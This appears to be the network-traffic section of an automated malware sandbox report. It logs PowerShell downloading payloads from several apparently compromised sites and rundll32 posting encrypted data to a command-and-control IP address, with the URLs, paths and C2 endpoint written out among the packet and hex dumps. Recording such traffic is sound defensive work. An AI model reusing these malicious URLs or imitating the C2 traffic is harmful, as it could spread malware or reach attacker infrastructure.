Jan 25, 2021 20:12:30.399123907 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.399291039 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.399312019 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.399331093 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.399348021 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.399353981 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.399367094 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.399394035 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.400307894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400326014 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400338888 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400378942 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.400841951 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400859118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400875092 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400895119 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400897980 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.400912046 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.400917053 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.400952101 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.401786089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.401807070 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.401823044 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.401839972 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.401859999 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.401866913 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.401887894 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.402769089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.402787924 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.402803898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.402823925 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.402823925 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.402844906 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.402880907 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.403769970 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.403793097 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.403809071 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.403827906 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.403840065 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.403846025 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.403866053 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.404208899 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.404742002 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.404758930 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.404778957 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.404798985 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.404802084 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.404818058 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.404839039 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.405729055 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.405750990 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.405771971 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.405788898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.405807972 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.405810118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.405838966 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.406764984 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.406781912 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.406795025 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.406812906 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.406831026 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.406836033 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.406846046 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.407725096 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.407747030 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.407773018 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.409811974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.409831047 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.409848928 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.409863949 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.409879923 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.409904003 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.409929037 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.410270929 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.410284996 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.410300970 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.410317898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.410334110 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.410346031 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.410372019 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.411263943 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411281109 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411293030 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411317110 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.411716938 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411735058 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411751986 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411761045 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.411772013 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411787033 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.411792994 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.411828995 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.412724018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.412741899 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.412761927 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.412781000 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.412785053 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.412802935 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.412823915 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.413712025 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.413729906 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.413747072 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.413763046 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.413769960 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.413789988 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.413791895 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.413839102 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.414730072 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.414752007 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.414771080 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.414782047 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.414793968 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.414865017 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.415683031 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.415700912 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.415714025 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.415730000 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.415749073 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.415751934 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.415771008 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.416693926 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.416707039 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.416754961 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.825259924 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.825284958 CET	49168	443	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:30.825310946 CET	49167	80	192.168.2.22	212.227.200.73
Jan 25, 2021 20:12:58.825218916 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:12:59.102284908 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:12:59.102427959 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:12:59.103532076 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:12:59.103671074 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:12:59.394356966 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:12:59.394557953 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:12:59.673166037 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:12:59.684923887 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:13:00.443907022 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:13:00.443974972 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:13:00.444140911 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:13:00.444178104 CET	49171	80	192.168.2.22	190.55.186.229
Jan 25, 2021 20:13:00.723769903 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:13:00.723798037 CET	80	49171	190.55.186.229	192.168.2.22
Jan 25, 2021 20:13:00.723963976 CET	49171	80	192.168.2.22	190.55.186.229

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 20:10:44.417489052 CET	52197	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:10:44.478864908 CET	53	52197	8.8.8.8	192.168.2.22
Jan 25, 2021 20:10:44.830226898 CET	53099	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:10:44.878052950 CET	53	53099	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:24.897778988 CET	52838	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:24.964365005 CET	53	52838	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:27.269634962 CET	61200	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:27.329468966 CET	53	61200	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:27.690537930 CET	49548	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:27.749794960 CET	53	49548	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:28.290766954 CET	55627	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:28.354037046 CET	53	55627	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:28.644392967 CET	56009	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:28.692291975 CET	53	56009	8.8.8.8	192.168.2.22
Jan 25, 2021 20:12:28.695425034 CET	61865	53	192.168.2.22	8.8.8.8
Jan 25, 2021 20:12:28.751976967 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 25, 2021 20:10:44.417489052 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	nightlifemumbai.club	A (IP address)	IN (0x0001)
Jan 25, 2021 20:10:44.830226898 CET	192.168.2.22	8.8.8.8	0xc896	Standard query (0)	shop.nowfal.dev	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:24.897778988 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	e-wdesign.eu	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:27.269634962 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	traumfrauen-ukraine.de	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:27.690537930 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	traumfrauen-ukraine.de	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:28.290766954 CET	192.168.2.22	8.8.8.8	0xad13	Standard query (0)	jflmktg.wpcomstaging.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 25, 2021 20:10:44.478864908 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	nightlifemumbai.club		172.217.6.174	A (IP address)	IN (0x0001)
Jan 25, 2021 20:10:44.878052950 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	shop.nowfal.dev		104.21.88.166	A (IP address)	IN (0x0001)
Jan 25, 2021 20:10:44.878052950 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	shop.nowfal.dev		172.67.151.106	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:24.964365005 CET	8.8.8.8	192.168.2.22	0x2c09	Server failure (2)	e-wdesign.eu	none	none	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:27.329468966 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	traumfrauen-ukraine.de		212.227.200.73	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:27.749794960 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	traumfrauen-ukraine.de		212.227.200.73	A (IP address)	IN (0x0001)
Jan 25, 2021 20:12:28.354037046 CET	8.8.8.8	192.168.2.22	0xad13	No error (0)	jflmktg.wpcomstaging.com		192.0.78.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nightlifemumbai.club

traumfrauen-ukraine.de

190.55.186.229

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	172.217.6.174	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2021 20:10:44.653403997 CET	0	OUT	GET /x/0wBD3/ HTTP/1.1 Host: nightlifemumbai.club Connection: Keep-Alive
Jan 25, 2021 20:10:44.807477951 CET	1	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1569 Date: Mon, 25 Jan 2021 19:10:44 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jan 25, 2021 20:10:44.807496071 CET	2	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49167	212.227.200.73	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2021 20:12:27.375190020 CET	7	OUT	GET /bin/JyeS/ HTTP/1.1 Host: traumfrauen-ukraine.de Connection: Keep-Alive
Jan 25, 2021 20:12:27.685669899 CET	8	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 25 Jan 2021 19:12:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/7.4.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=u4jqg2tisvnuti3u08sjaomuao; path=/; secure; HttpOnly X-Content-Type-Options: nosniff Location: https://traumfrauen-ukraine.de/bin/JyeS/ Last-Modified: Mon, 25 Jan 2021 19:12:18 GMT X-Powered-By: PleskLin
Jan 25, 2021 20:12:27.928705931 CET	13	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 25 Jan 2021 19:12:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/7.4.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=u4jqg2tisvnuti3u08sjaomuao; path=/; secure; HttpOnly X-Content-Type-Options: nosniff Location: https://traumfrauen-ukraine.de/bin/JyeS/ Last-Modified: Mon, 25 Jan 2021 19:12:18 GMT X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49171	190.55.186.229	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2021 20:12:59.103532076 CET	735	OUT	POST /pvaadnb3/ HTTP/1.1 DNT: 0 Referer: 190.55.186.229/pvaadnb3/ Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTC User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.55.186.229 Content-Length: 5508 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2021 20:12:59.103671074 CET	736	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4a 61 76 71 53 59 6c 6d 72 4f 54 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 4e 58 59 76 7a 6b 4a 22 3b 20 66 69 6c 65 Data Ascii: --------------JavqSYlmrOTCContent-Disposition: form-data; name="NXYvzkJ"; filename="xPrGvEfURVffANsVuT"Content-Type: application/octet-stream1FhE\<f=?\|3VlC`BBDka];GC:0Js11!>S,=;$p
Jan 25, 2021 20:12:59.394557953 CET	740	OUT	Data Raw: dd 5e 44 78 08 04 42 03 19 9d b8 e4 5a 26 3a 11 34 13 ad f8 db 4c 6f 6d 5e 75 ad 5c b2 a6 76 c7 14 68 cf de 85 56 90 bc 1b 65 d5 66 b1 6c 30 7e 23 02 de ba 04 29 09 7b 4b 05 75 6b 93 69 92 d7 1f f6 a2 0c 67 42 fb 70 8d 20 61 1f 27 46 98 b1 78 2b Data Ascii: ^DxBZ&:4Lom^u\vhVefl0~#){KukigBp a'Fx+_*?jNPCXq :F9x!X/.@f90Jv,'_\'V>+$NS'P+OJJ0Rj+r#voE--------------Ja
Jan 25, 2021 20:13:00.443907022 CET	742	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Jan 2021 19:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 63 39 34 0d 0a 42 85 d3 48 0f 3b 50 13 7a c2 46 27 8c f4 4b b3 dd 25 32 75 45 4e e9 d0 00 6d b3 4f e9 bc 60 5c aa 62 81 a8 f7 1a 99 79 68 3c 39 fa c6 54 4f 51 02 3b 47 af 9e e1 70 c0 66 47 cf eb f1 f5 9b b0 01 52 a0 aa 35 7e ea 7f d1 21 7a 27 0d b3 86 99 7c b3 a0 98 58 99 91 08 d5 3f 8e 10 a5 5c 48 19 a8 45 4b 43 88 bf 7f 4b 0e 25 cc 8d 2b 87 d7 1b 68 86 e1 f3 1c 06 ee bd d9 57 b1 24 e5 bb 26 f8 3d 97 62 cb 33 68 5d 34 c3 58 fa d1 17 b2 03 cd e9 4c 17 cb 58 4d 88 41 c5 17 15 47 26 ed 94 ad e2 ca 74 44 de 05 1e 96 af f0 83 a6 27 35 63 54 cb 36 68 74 a3 62 8a 40 27 7c 47 f2 24 1a 63 a6 0b d0 c9 18 b8 93 1c 2b 4d 4f 9d 41 f9 fa b8 88 09 39 a2 65 c2 ec ca a1 17 26 30 b3 7a 39 f6 51 a7 c9 46 1c ca cf 12 a9 38 63 66 dc ff 